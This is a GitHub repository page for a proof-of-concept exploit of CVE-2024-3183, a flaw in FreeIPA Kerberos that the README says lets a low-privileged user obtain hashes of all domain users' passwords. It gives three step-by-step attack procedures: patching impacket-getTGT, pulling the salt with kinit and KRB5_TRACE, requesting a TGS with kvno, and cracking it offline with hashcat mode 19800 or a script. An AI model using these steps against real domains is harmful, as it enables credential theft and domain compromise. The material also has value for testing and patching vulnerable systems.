Skip to content

Cyxow/CVE-2024-3183-POC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 
crypto.py
crypto.py
 
 
main.py
main.py
 
 

Repository files navigation

CVE-2024-3183-POC

POC for CVE-2024-3183 (FreeIPA Rosting)

Impact: A low-privileged user can obtain a hash of the passwords of all domain users and perform offline brute force (kerberoasting).

Patch impacket-getTGT:

  1. Add decoder.decode.defaultErrorState = stGetValueDecoderByTag to impacket/krb5/kerberosv5.py.
  2. Enjoy!

POC1:

  1. Add decoder.decode.defaultErrorState = stGetValueDecoderByTag to impacket/krb5/kerberosv5.py.
  2. You can use impacket-getTGT whith -service option and -debug option for get salt in one command. impacket-getTGT test.local/user -debug -service admin

POC2:

  1. First, let's request a TGT ticket for an already compromised user "admin". kinit user foto1
  2. Secondly, we will find out the salt of the "admin" user: printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. Get TGS for "admin": kvno admin foto foto3
  4. Use python script (or hashcat mod 19800 with specific salt) for brute force TGS foto4

1 - TGS, 2 - SALT, 3 - Passwords.

  1. Congratulations, we now have the user password “admin”.

POC3:

  1. You can use kinit for one move: kinit -S target user

and you get TGT who encripted by target user key.

About

POC for CVE-2024-3183 (FreeIPA Rosting)

Resources

Readme
Activity

Stars

18 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages